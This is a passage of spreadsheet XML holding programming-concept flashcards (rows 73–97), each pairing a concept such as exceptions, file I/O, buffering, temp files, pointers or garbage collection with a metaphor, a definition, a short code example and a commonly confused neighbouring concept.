        </is>
      </c>
      <c r="D73" t="inlineStr">
        <is>
          <t>Firemen holding round canvas nets (except clauses) beneath a burning building (the try block): whatever leaps from the risky floors lands in the first net whose label matches its type.</t>
        </is>
      </c>
      <c r="E73" t="inlineStr">
        <is>
          <t>try wraps risky code; except/catch clauses receive matching thrown exceptions so the program can handle failure and continue.</t>
        </is>
      </c>
      <c r="F73" t="inlineStr">
        <is>
          <t>try: / x = int(s) / except ValueError: / x = 0</t>
        </is>
      </c>
      <c r="G73" t="inlineStr">
        <is>
          <t>finally - except runs only on a matching failure; finally runs on every exit path.</t>
        </is>
      </c>
      <c r="H73" t="inlineStr">
        <is>
          <t>A trapeze act with type-labeled safety nets</t>
        </is>
      </c>
      <c r="J73" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K73" t="inlineStr">
        <is>
          <t>Errors &amp; exceptions</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" t="n">
        <v>0</v>
      </c>
      <c r="B74" t="inlineStr">
        <is>
          <t>072</t>
        </is>
      </c>
      <c r="C74" t="inlineStr">
        <is>
          <t>finally</t>
        </is>
      </c>
      <c r="D74" t="inlineStr">
        <is>
          <t>A theater janitor who sweeps the stage after every show: hit performance, cancelled show, or the lead storming off mid-scene (an exception) - the broom always makes its pass before the doors lock.</t>
        </is>
      </c>
      <c r="E74" t="inlineStr">
        <is>
          <t>finally runs on every exit from try - success, caught or uncaught exception, even return - making it the home of cleanup.</t>
        </is>
      </c>
      <c r="F74" t="inlineStr">
        <is>
          <t>try: / f = open(p); work(f) / finally: / f.close()</t>
        </is>
      </c>
      <c r="G74" t="inlineStr">
        <is>
          <t>try/else - Python's else clause runs only when try succeeded; finally runs unconditionally.</t>
        </is>
      </c>
      <c r="H74" t="inlineStr">
        <is>
          <t>A hotel checkout charge that posts no matter how you leave</t>
        </is>
      </c>
      <c r="J74" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K74" t="inlineStr">
        <is>
          <t>Errors &amp; exceptions</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" t="n">
        <v>0</v>
      </c>
      <c r="B75" t="inlineStr">
        <is>
          <t>073</t>
        </is>
      </c>
      <c r="C75" t="inlineStr">
        <is>
          <t>Exception hierarchy</t>
        </is>
      </c>
      <c r="D75" t="inlineStr">
        <is>
          <t>A family reunion where security arrests by surname: the warrant says 'anyone named LookupError' and both cousins KeyError and IndexError get cuffed. Arrest patriarch BaseException and you drag in even Ctrl-C.</t>
        </is>
      </c>
      <c r="E75" t="inlineStr">
        <is>
          <t>Exceptions form a class tree: a handler for a base class catches all subclasses, so order handlers specific-first.</t>
        </is>
      </c>
      <c r="F75" t="inlineStr">
        <is>
          <t>except LookupError: # catches KeyError and IndexError</t>
        </is>
      </c>
      <c r="G75" t="inlineStr">
        <is>
          <t>Exception vs BaseException - BaseException also covers KeyboardInterrupt/SystemExit; catching it is almost always too broad.</t>
        </is>
      </c>
      <c r="H75" t="inlineStr">
        <is>
          <t>Nets with widening mesh sizes stacked in a river</t>
        </is>
      </c>
      <c r="J75" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K75" t="inlineStr">
        <is>
          <t>Errors &amp; exceptions</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" t="n">
        <v>0</v>
      </c>
      <c r="B76" t="inlineStr">
        <is>
          <t>074</t>
        </is>
      </c>
      <c r="C76" t="inlineStr">
        <is>
          <t>Checked vs unchecked exceptions</t>
        </is>
      </c>
      <c r="D76" t="inlineStr">
        <is>
          <t>Airport customs: checked exceptions are checked luggage - declare every bag on the form (throws IOException) or the compiler refuses boarding; unchecked ones are pickpockets strolling through undeclared.</t>
        </is>
      </c>
      <c r="E76" t="inlineStr">
        <is>
          <t>Checked exceptions (Java) must be declared or handled at compile time; unchecked ones (RuntimeException, all of Python) fly free.</t>
        </is>
      </c>
      <c r="F76" t="inlineStr">
        <is>
          <t>Java: void read() throws IOException; / NullPointerException needs no throws clause</t>
        </is>
      </c>
      <c r="G76" t="inlineStr">
        <is>
          <t>Java Error - Error (OutOfMemory) is unchecked and unrecoverable by design; checked-ness is about compiler enforcement.</t>
        </is>
      </c>
      <c r="H76" t="inlineStr">
        <is>
          <t>Prescription drugs vs over-the-counter</t>
        </is>
      </c>
      <c r="J76" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K76" t="inlineStr">
        <is>
          <t>Errors &amp; exceptions</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" t="n">
        <v>0</v>
      </c>
      <c r="B77" t="inlineStr">
        <is>
          <t>075</t>
        </is>
      </c>
      <c r="C77" t="inlineStr">
        <is>
          <t>Error codes vs exceptions</t>
        </is>
      </c>
      <c r="D77" t="inlineStr">
        <is>
          <t>Two restaurants: in the C diner the waiter slips a folded '-1' under your plate and hopes you notice before eating; in the exceptions bistro the chef bursts out and flips your whole table when a dish fails.</t>
        </is>
      </c>
      <c r="E77" t="inlineStr">
        <is>
          <t>Error codes return failure in-band for callers to test - and forget; exceptions use a separate channel that cannot be silently ignored.</t>
        </is>
      </c>
      <c r="F77" t="inlineStr">
        <is>
          <t>C: n = read(fd, buf, sz); // -1 on error / Go: val, err := f() / Python: raises OSError</t>
        </is>
      </c>
      <c r="G77" t="inlineStr">
        <is>
          <t>Result types - Rust's Result is explicit like codes but unignorable like exceptions, enforced by the type system.</t>
        </is>
      </c>
      <c r="H77" t="inlineStr">
        <is>
          <t>A smoke detector vs a note saying 'check for fire'</t>
        </is>
      </c>
      <c r="J77" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K77" t="inlineStr">
        <is>
          <t>Errors &amp; exceptions</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" t="n">
        <v>0</v>
      </c>
      <c r="B78" t="inlineStr">
        <is>
          <t>076</t>
        </is>
      </c>
      <c r="C78" t="inlineStr">
        <is>
          <t>Stack trace</t>
        </is>
      </c>
      <c r="D78" t="inlineStr">
        <is>
          <t>An avalanche investigator following boot prints back up the mountain: the deepest print is where the climber fell (the raising line); each print above names the ridge - file and line - that led there.</t>
        </is>
      </c>
      <c r="E78" t="inlineStr">
        <is>
          <t>A stack trace snapshots the call chain at throw time; read Python's bottom-up from the failing line through each caller.</t>
        </is>
      </c>
      <c r="F78" t="inlineStr">
        <is>
          <t>Traceback (most recent call last): / File "app.py", line 12, in main / ValueError: bad input</t>
        </is>
      </c>
      <c r="G78" t="inlineStr">
        <is>
          <t>Exception message - the message says what went wrong; the trace says where and via which call path.</t>
        </is>
      </c>
      <c r="H78" t="inlineStr">
        <is>
          <t>A paper trail of signed hand-off slips</t>
        </is>
      </c>
      <c r="J78" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K78" t="inlineStr">
        <is>
          <t>Errors &amp; exceptions</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" t="n">
        <v>0</v>
      </c>
      <c r="B79" t="inlineStr">
        <is>
          <t>077</t>
        </is>
      </c>
      <c r="C79" t="inlineStr">
        <is>
          <t>Fail fast</t>
        </is>
      </c>
      <c r="D79" t="inlineStr">
        <is>
          <t>A fuse box that pops the instant one wire frays - lights out in one room - versus a house that stays lit while the wiring smolders in the walls, then burns down three suburbs from the fray.</t>
        </is>
      </c>
      <c r="E79" t="inlineStr">
        <is>
          <t>Detect bad state early and stop loudly at the source (asserts, validation) instead of limping on and corrupting data far from the cause.</t>
        </is>
      </c>
      <c r="F79" t="inlineStr">
        <is>
          <t>def withdraw(amount): / assert amount &gt; 0, "negative amount"</t>
        </is>
      </c>
      <c r="G79" t="inlineStr">
        <is>
          <t>Graceful degradation - tolerance suits user-facing edges; fail fast suits internal invariants where continuing hides bugs.</t>
        </is>
      </c>
      <c r="H79" t="inlineStr">
        <is>
          <t>A dead man's switch on a locomotive</t>
        </is>
      </c>
      <c r="J79" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K79" t="inlineStr">
        <is>
          <t>Errors &amp; exceptions</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" t="n">
        <v>0</v>
      </c>
      <c r="B80" t="inlineStr">
        <is>
          <t>078</t>
        </is>
      </c>
      <c r="C80" t="inlineStr">
        <is>
          <t>Swallowing exceptions</t>
        </is>
      </c>
      <c r="D80" t="inlineStr">
        <is>
          <t>A pelican security guard gulping every alarm bird into its silent pouch - fire alarms, burglar alarms, the boss's Ctrl-C parrot - then smiling at the auditors: 'all quiet here.'</t>
        </is>
      </c>
      <c r="E80" t="inlineStr">
        <is>
          <t>except: pass hides real failures - even Ctrl-C; catch the narrowest type and at minimum log before continuing.</t>
        </is>
      </c>
      <c r="F80" t="inlineStr">
        <is>
          <t>try: risky() / except: pass # hides everything / except ValueError: log.warning(...) # better</t>
        </is>
      </c>
      <c r="G80" t="inlineStr">
        <is>
          <t>Intentional suppression - contextlib.suppress(FileNotFoundError) names exactly what is safely ignorable; bare except hides all.</t>
        </is>
      </c>
      <c r="H80" t="inlineStr">
        <is>
          <t>Taping over the check-engine light</t>
        </is>
      </c>
      <c r="J80" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K80" t="inlineStr">
        <is>
          <t>Errors &amp; exceptions</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" t="n">
        <v>0</v>
      </c>
      <c r="B81" t="inlineStr">
        <is>
          <t>079</t>
        </is>
      </c>
      <c r="C81" t="inlineStr">
        <is>
          <t>Re-raise &amp; exception chaining</t>
        </is>
      </c>
      <c r="D81" t="inlineStr">
        <is>
          <t>A relay runner catches a flaming baton, tapes a note to it - 'happened while loading config' - and hurls it onward; the tape ('from e') keeps the original scorch marks readable underneath.</t>
        </is>
      </c>
      <c r="E81" t="inlineStr">
        <is>
          <t>Bare 'raise' rethrows the current exception intact; 'raise New(...) from e' wraps it while preserving the original cause and traceback.</t>
        </is>
      </c>
      <c r="F81" t="inlineStr">
        <is>
          <t>except KeyError as e: / raise ConfigError("bad key") from e</t>
        </is>
      </c>
      <c r="G81" t="inlineStr">
        <is>
          <t>raise New() without from - Python shows an implicit 'During handling...' note; explicit from marks the true cause, from None hides it.</t>
        </is>
      </c>
      <c r="H81" t="inlineStr">
        <is>
          <t>Forwarding a letter inside a new annotated envelope</t>
        </is>
      </c>
      <c r="J81" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K81" t="inlineStr">
        <is>
          <t>Errors &amp; exceptions</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" t="n">
        <v>0</v>
      </c>
      <c r="B82" t="inlineStr">
        <is>
          <t>080</t>
        </is>
      </c>
      <c r="C82" t="inlineStr">
        <is>
          <t>Stream</t>
        </is>
      </c>
      <c r="D82" t="inlineStr">
        <is>
          <t>Drinking a river through a straw: the water arrives in exactly the order the river sends it, you can't re-sip yesterday's gulp, and you never need a lake-sized cup.</t>
        </is>
      </c>
      <c r="E82" t="inlineStr">
        <is>
          <t>A stream is a sequential channel of data consumed piece by piece, in order, usually unrewindable, never needing to fit in memory.</t>
        </is>
      </c>
      <c r="F82" t="inlineStr">
        <is>
          <t>for chunk in iter(lambda: f.read(8192), b""): / process(chunk)</t>
        </is>
      </c>
      <c r="G82" t="inlineStr">
        <is>
          <t>File - a file on disk is random-access and seekable; a stream is the sequential flow of reading or writing it.</t>
        </is>
      </c>
      <c r="H82" t="inlineStr">
        <is>
          <t>A ticker tape you read as it feeds out</t>
        </is>
      </c>
      <c r="J82" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K82" t="inlineStr">
        <is>
          <t>Input/output &amp; files</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" t="n">
        <v>0</v>
      </c>
      <c r="B83" t="inlineStr">
        <is>
          <t>081</t>
        </is>
      </c>
      <c r="C83" t="inlineStr">
        <is>
          <t>stdin, stdout, stderr</t>
        </is>
      </c>
      <c r="D83" t="inlineStr">
        <is>
          <t>A short-order cook with a mouth-tube (0) delivering order slips, a serving hatch (1) sending dishes down the pipe to the next kitchen, and a side window (2) for shouting complaints at the manager - shouts never land on the plates.</t>
        </is>
      </c>
      <c r="E83" t="inlineStr">
        <is>
          <t>Every process gets stdin (fd 0), stdout (fd 1) for results, stderr (fd 2) for diagnostics - split so pipes carry data, not errors.</t>
        </is>
      </c>
      <c r="F83" t="inlineStr">
        <is>
          <t>cmd | sort # pipes stdout only / print(msg, file=sys.stderr)</t>
        </is>
      </c>
      <c r="G83" t="inlineStr">
        <is>
          <t>stdout vs stderr - both often hit the same terminal, but redirection splits them: 2&gt; captures only errors.</t>
        </is>
      </c>
      <c r="H83" t="inlineStr">
        <is>
          <t>Three pneumatic tubes labeled in, out, complaints</t>
        </is>
      </c>
      <c r="J83" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K83" t="inlineStr">
        <is>
          <t>Input/output &amp; files</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" t="n">
        <v>0</v>
      </c>
      <c r="B84" t="inlineStr">
        <is>
          <t>082</t>
        </is>
      </c>
      <c r="C84" t="inlineStr">
        <is>
          <t>File handles</t>
        </is>
      </c>
      <c r="D84" t="inlineStr">
        <is>
          <t>A cloakroom ticket from the OS's coat check: the numbered tag (descriptor) is your only way back to the coat, the attendant remembers where you left off, and the rack holds a limited number of tags before new customers are turned away.</t>
        </is>
      </c>
      <c r="E84" t="inlineStr">
        <is>
          <t>open() returns a file object wrapping an OS descriptor that tracks position and mode; descriptors are finite, so every open needs a close.</t>
        </is>
      </c>
      <c r="F84" t="inlineStr">
        <is>
          <t>f = open("log.txt", "a") / f.write(line) / f.close()</t>
        </is>
      </c>
      <c r="G84" t="inlineStr">
        <is>
          <t>Path - the path is the file's address; the handle is a live, stateful connection to the file.</t>
        </is>
      </c>
      <c r="H84" t="inlineStr">
        <is>
          <t>A library card tracking your open page</t>
        </is>
      </c>
      <c r="J84" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K84" t="inlineStr">
        <is>
          <t>Input/output &amp; files</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" t="n">
        <v>0</v>
      </c>
      <c r="B85" t="inlineStr">
        <is>
          <t>083</t>
        </is>
      </c>
      <c r="C85" t="inlineStr">
        <is>
          <t>with statement (context manager)</t>
        </is>
      </c>
      <c r="D85" t="inlineStr">
        <is>
          <t>A submarine airlock: step in and the machinery arms itself; however you leave - walking out calmly or blown out by an explosion - the hatch slams and seals itself behind you.</t>
        </is>
      </c>
      <c r="E85" t="inlineStr">
        <is>
          <t>with open(...) as f guarantees close() on block exit - success or exception - via __enter__/__exit__; RAII's Python cousin.</t>
        </is>
      </c>
      <c r="F85" t="inlineStr">
        <is>
          <t>with open(p) as f: / data = f.read() # closed even on error</t>
        </is>
      </c>
      <c r="G85" t="inlineStr">
        <is>
          <t>try/finally - with is sugar for try/finally-close, minus the boilerplate you'd eventually forget.</t>
        </is>
      </c>
      <c r="H85" t="inlineStr">
        <is>
          <t>A self-closing bank vault door on a timer</t>
        </is>
      </c>
      <c r="J85" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K85" t="inlineStr">
        <is>
          <t>Input/output &amp; files</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" t="n">
        <v>0</v>
      </c>
      <c r="B86" t="inlineStr">
        <is>
          <t>084</t>
        </is>
      </c>
      <c r="C86" t="inlineStr">
        <is>
          <t>Text vs binary mode</t>
        </is>
      </c>
      <c r="D86" t="inlineStr">
        <is>
          <t>Two mail slots at a translator's office: the 'r' slot runs every letter through the resident interpreter (decoding, newline smoothing); the 'rb' slot drops the envelope on your desk unopened - the only safe slot for a shipped clockwork (a JPEG).</t>
        </is>
      </c>
      <c r="E86" t="inlineStr">
        <is>
          <t>Text mode ('r') decodes bytes to str and translates newlines; binary ('rb') yields raw bytes - required for images, zips, exact round-trips.</t>
        </is>
      </c>
      <c r="F86" t="inlineStr">
        <is>
          <t>open(p).read() # str / open(p, "rb").read() # bytes</t>
        </is>
      </c>
      <c r="G86" t="inlineStr">
        <is>
          <t>Windows newlines - text mode maps \r\n to \n; opening a JPEG in text mode corrupts it.</t>
        </is>
      </c>
      <c r="H86" t="inlineStr">
        <is>
          <t>A car wash lane vs a do-not-wash flatbed</t>
        </is>
      </c>
      <c r="J86" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K86" t="inlineStr">
        <is>
          <t>Input/output &amp; files</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" t="n">
        <v>0</v>
      </c>
      <c r="B87" t="inlineStr">
        <is>
          <t>085</t>
        </is>
      </c>
      <c r="C87" t="inlineStr">
        <is>
          <t>Buffering &amp; flush</t>
        </is>
      </c>
      <c r="D87" t="inlineStr">
        <is>
          <t>A postal clerk piling your letters into a mailbag, driving to the depot only when the bag is full: your 'sent' love letter is still in the bag when the power dies - unless you yell FLUSH and he drives now.</t>
        </is>
      </c>
      <c r="E87" t="inlineStr">
        <is>
          <t>Writes sit in a memory buffer until it fills, the stream closes, or you flush() - so 'written' output may not be on disk or screen yet.</t>
        </is>
      </c>
      <c r="F87" t="inlineStr">
        <is>
          <t>print("working...", end="", flush=True) / f.flush(); os.fsync(f.fileno())</t>
        </is>
      </c>
      <c r="G87" t="inlineStr">
        <is>
          <t>flush vs fsync - flush empties the app buffer into the OS; fsync forces the OS cache onto physical disk.</t>
        </is>
      </c>
      <c r="H87" t="inlineStr">
        <is>
          <t>A dam releasing water only when the reservoir fills</t>
        </is>
      </c>
      <c r="J87" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K87" t="inlineStr">
        <is>
          <t>Input/output &amp; files</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" t="n">
        <v>0</v>
      </c>
      <c r="B88" t="inlineStr">
        <is>
          <t>086</t>
        </is>
      </c>
      <c r="C88" t="inlineStr">
        <is>
          <t>Slurp vs stream reading</t>
        </is>
      </c>
      <c r="D88" t="inlineStr">
        <is>
          <t>Two ways to eat spaghetti: the slurper inhales the entire bowl in one breath - fine until the bowl is 40 GB - while the twirler winds one fork-line at a time and never needs a bigger mouth.</t>
        </is>
      </c>
      <c r="E88" t="inlineStr">
        <is>
          <t>read() loads the whole file into memory; iterating the file object streams line by line in constant memory - choose by file size.</t>
        </is>
      </c>
      <c r="F88" t="inlineStr">
        <is>
          <t>data = f.read() # all at once / for line in f: # lazy, constant memory / handle(line)</t>
        </is>
      </c>
      <c r="G88" t="inlineStr">
        <is>
          <t>readlines() - readlines() still loads everything into a list; 'for line in f' is the lazy one.</t>
        </is>
      </c>
      <c r="H88" t="inlineStr">
        <is>
          <t>Downloading a movie vs streaming it</t>
        </is>
      </c>
      <c r="J88" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K88" t="inlineStr">
        <is>
          <t>Input/output &amp; files</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" t="n">
        <v>0</v>
      </c>
      <c r="B89" t="inlineStr">
        <is>
          <t>087</t>
        </is>
      </c>
      <c r="C89" t="inlineStr">
        <is>
          <t>File paths</t>
        </is>
      </c>
      <c r="D89" t="inlineStr">
        <is>
          <t>Two sets of directions to a house: the absolute deed reads from the planet's root ('/earth/usa/main-st/42'), while the relative sticky note ('two doors left') turns worthless the moment you - the CWD - wander to another street.</t>
        </is>
      </c>
      <c r="E89" t="inlineStr">
        <is>
          <t>Absolute paths start at the root; relative ones resolve against the current working directory - join with pathlib, never string +.</t>
        </is>
      </c>
      <c r="F89" t="inlineStr">
        <is>
          <t>from pathlib import Path / p = Path(base) / "data" / "a.csv" / p.resolve()</t>
        </is>
      </c>
      <c r="G89" t="inlineStr">
        <is>
          <t>CWD vs script dir - relative paths resolve from where the process launched, not where the .py lives; use Path(__file__).parent.</t>
        </is>
      </c>
      <c r="H89" t="inlineStr">
        <is>
          <t>GPS coordinates vs 'turn left at the bakery'</t>
        </is>
      </c>
      <c r="J89" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K89" t="inlineStr">
        <is>
          <t>Input/output &amp; files</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" t="n">
        <v>0</v>
      </c>
      <c r="B90" t="inlineStr">
        <is>
          <t>088</t>
        </is>
      </c>
      <c r="C90" t="inlineStr">
        <is>
          <t>Temp files</t>
        </is>
      </c>
      <c r="D90" t="inlineStr">
        <is>
          <t>A hotel's self-shredding notepad by the phone: each guest gets a page with an unguessable serial number so no two guests ever collide, and the page dissolves the moment they hang up (close).</t>
        </is>
      </c>
      <c r="E90" t="inlineStr">
        <is>
          <t>tempfile creates scratch files with unique names atomically - dodging collisions and predictable-name attacks - and can auto-delete on close.</t>
        </is>
      </c>
      <c r="F90" t="inlineStr">
        <is>
          <t>with tempfile.NamedTemporaryFile(suffix=".csv") as f: / f.write(data)</t>
        </is>
      </c>
      <c r="G90" t="inlineStr">
        <is>
          <t>Hardcoded /tmp/foo - a fixed name invites collisions and symlink attacks; tempfile creates uniquely and atomically.</t>
        </is>
      </c>
      <c r="H90" t="inlineStr">
        <is>
          <t>A whiteboard wiped between every meeting</t>
        </is>
      </c>
      <c r="J90" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K90" t="inlineStr">
        <is>
          <t>Input/output &amp; files</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" t="n">
        <v>0</v>
      </c>
      <c r="B91" t="inlineStr">
        <is>
          <t>089</t>
        </is>
      </c>
      <c r="C91" t="inlineStr">
        <is>
          <t>EOF (end of file)</t>
        </is>
      </c>
      <c r="D91" t="inlineStr">
        <is>
          <t>Pulling rope from a well hand over hand until suddenly your fists close on air: no 'end knot' was ever tied - the empty grab itself is the message that the well is done.</t>
        </is>
      </c>
      <c r="E91" t="inlineStr">
        <is>
          <t>EOF is not a character - reads signal it by returning empty ('' or b'') in Python or -1 in C; loops must test for it to stop.</t>
        </is>
      </c>
      <c r="F91" t="inlineStr">
        <is>
          <t>while True: / chunk = f.read(4096) / if not chunk: break</t>
        </is>
      </c>
      <c r="G91" t="inlineStr">
        <is>
          <t>Ctrl-D / Ctrl-Z - those keystrokes make the terminal close stdin, causing EOF; they are not characters in the data.</t>
        </is>
      </c>
      <c r="H91" t="inlineStr">
        <is>
          <t>A gas gauge that only reports empty by the engine stopping</t>
        </is>
      </c>
      <c r="J91" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K91" t="inlineStr">
        <is>
          <t>Input/output &amp; files</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" t="n">
        <v>0</v>
      </c>
      <c r="B92" t="inlineStr">
        <is>
          <t>090</t>
        </is>
      </c>
      <c r="C92" t="inlineStr">
        <is>
          <t>Stack vs heap</t>
        </is>
      </c>
      <c r="D92" t="inlineStr">
        <is>
          <t>A spring-loaded cafeteria tray dispenser (stack): trays slap on and pop off in strict order, wiped instantly. Beside it sprawls a flea-market yard (heap) where objects squat at odd addresses until someone hauls them away.</t>
        </is>
      </c>
      <c r="E92" t="inlineStr">
        <is>
          <t>The stack holds each call's locals in LIFO frames freed automatically at return; the heap holds allocated objects with arbitrary lifetimes.</t>
        </is>
      </c>
      <c r="F92" t="inlineStr">
        <is>
          <t>def f(): / x = 1 # frame slot on stack / obj = MyClass() # object lives on heap</t>
        </is>
      </c>
      <c r="G92" t="inlineStr">
        <is>
          <t>Stack (data structure) - the call stack is a specific runtime memory region; the ADT is any LIFO container.</t>
        </is>
      </c>
      <c r="H92" t="inlineStr">
        <is>
          <t>A pancake stack next to a junkyard</t>
        </is>
      </c>
      <c r="J92" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K92" t="inlineStr">
        <is>
          <t>Memory model basics</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" t="n">
        <v>0</v>
      </c>
      <c r="B93" t="inlineStr">
        <is>
          <t>091</t>
        </is>
      </c>
      <c r="C93" t="inlineStr">
        <is>
          <t>Pointer</t>
        </is>
      </c>
      <c r="D93" t="inlineStr">
        <is>
          <t>A treasure map tattooed with pure coordinates: the map weighs nothing yet leads your shovel (*) straight to the chest - and adding 1 to the coordinates strides exactly one chest-width east (pointer arithmetic).</t>
        </is>
      </c>
      <c r="E93" t="inlineStr">
        <is>
          <t>A pointer is a variable holding a memory address; dereferencing (*p) follows it to the value, and arithmetic steps it through arrays.</t>
        </is>
      </c>
      <c r="F93" t="inlineStr">
        <is>
          <t>C: int x = 5; int *p = &amp;x; / *p = 7; // x is now 7</t>
        </is>
      </c>
      <c r="G93" t="inlineStr">
        <is>
          <t>Reference - a reference is an opaque alias with no arithmetic or arbitrary addresses; pointers are raw and nullable.</t>
        </is>
      </c>
      <c r="H93" t="inlineStr">
        <is>
          <t>A house key ring labeled only with street addresses</t>
        </is>
      </c>
      <c r="J93" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K93" t="inlineStr">
        <is>
          <t>Memory model basics</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" t="n">
        <v>0</v>
      </c>
      <c r="B94" t="inlineStr">
        <is>
          <t>092</t>
        </is>
      </c>
      <c r="C94" t="inlineStr">
        <is>
          <t>Reference</t>
        </is>
      </c>
      <c r="D94" t="inlineStr">
        <is>
          <t>A hotel intercom labeled 'Suite 9': press it and you're simply talking to whoever occupies the suite - you never learn the street address and can't ask the intercom for 'the room next door'.</t>
        </is>
      </c>
      <c r="E94" t="inlineStr">
        <is>
          <t>A reference is a managed alias to an object - no visible address, no arithmetic, often non-null - the safe indirection of Java/Python.</t>
        </is>
      </c>
      <c r="F94" t="inlineStr">
        <is>
          <t>a = [1, 2] / b = a / b.append(3) # a is [1, 2, 3]</t>
        </is>
      </c>
      <c r="G94" t="inlineStr">
        <is>
          <t>Pointer - pointers expose the address and allow arithmetic and null; references hide all of that.</t>
        </is>
      </c>
      <c r="H94" t="inlineStr">
        <is>
          <t>A speed-dial button with no number printed on it</t>
        </is>
      </c>
      <c r="J94" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K94" t="inlineStr">
        <is>
          <t>Memory model basics</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" t="n">
        <v>0</v>
      </c>
      <c r="B95" t="inlineStr">
        <is>
          <t>093</t>
        </is>
      </c>
      <c r="C95" t="inlineStr">
        <is>
          <t>Pass by value</t>
        </is>
      </c>
      <c r="D95" t="inlineStr">
        <is>
          <t>A photocopier bolted into the function's doorway: every argument walks up, a photocopy steps inside while the original waits in the lobby - scribble on the copy all you like.</t>
        </is>
      </c>
      <c r="E95" t="inlineStr">
        <is>
          <t>Pass by value copies the argument into the parameter, so reassigning the parameter never touches the caller's variable.</t>
        </is>
      </c>
      <c r="F95" t="inlineStr">
        <is>
          <t>def f(n): n = 99 / x = 5; f(x) / x -&gt; 5</t>
        </is>
      </c>
      <c r="G95" t="inlineStr">
        <is>
          <t>Pass by object reference - Python copies the reference: rebinding the param does nothing, but mutating the shared object shows outside.</t>
        </is>
      </c>
      <c r="H95" t="inlineStr">
        <is>
          <t>Handing over a photograph of your car, not the keys</t>
        </is>
      </c>
      <c r="J95" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K95" t="inlineStr">
        <is>
          <t>Memory model basics</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" t="n">
        <v>0</v>
      </c>
      <c r="B96" t="inlineStr">
        <is>
          <t>094</t>
        </is>
      </c>
      <c r="C96" t="inlineStr">
        <is>
          <t>Pass by reference</t>
        </is>
      </c>
      <c r="D96" t="inlineStr">
        <is>
          <t>Instead of a photocopy, the caller shoves their actual house key under the function's door on a string: the function unlocks the caller's own cupboard and rearranges it, and the changes are waiting when the caller gets home.</t>
        </is>
      </c>
      <c r="E96" t="inlineStr">
        <is>
          <t>Pass by reference aliases the caller's variable itself, so assigning the parameter rewrites the caller's variable (C++ &amp;, C# ref).</t>
        </is>
      </c>
      <c r="F96" t="inlineStr">
        <is>
          <t>C++: void f(int &amp;n) { n = 99; } / int x = 5; f(x); // x == 99</t>
        </is>
      </c>
      <c r="G96" t="inlineStr">
        <is>
          <t>Mutating a passed object - Python/Java can mutate shared objects but cannot rebind the caller's variable; true by-ref can.</t>
        </is>
      </c>
      <c r="H96" t="inlineStr">
        <is>
          <t>Giving a valet your real keys instead of a photo</t>
        </is>
      </c>
      <c r="J96" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K96" t="inlineStr">
        <is>
          <t>Memory model basics</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" t="n">
        <v>0</v>
      </c>
      <c r="B97" t="inlineStr">
        <is>
          <t>095</t>
        </is>
      </c>
      <c r="C97" t="inlineStr">
        <is>
          <t>Garbage collection (tracing)</t>
        </is>
      </c>
      <c r="D97" t="inlineStr">
        <is>
          <t>A night watchman in a museum follows every rope from the entrance (the roots), tagging each statue the ropes reach; at dawn, everything untagged is forklifted to the crusher - even beautiful statues no rope touches.</t>
        </is>
      </c>
      <c r="E97" t="inlineStr">
        <is>
          <t>A tracing GC walks references from roots (stack, globals) to find live objects and reclaims everything unreachable.</t>
        </is>
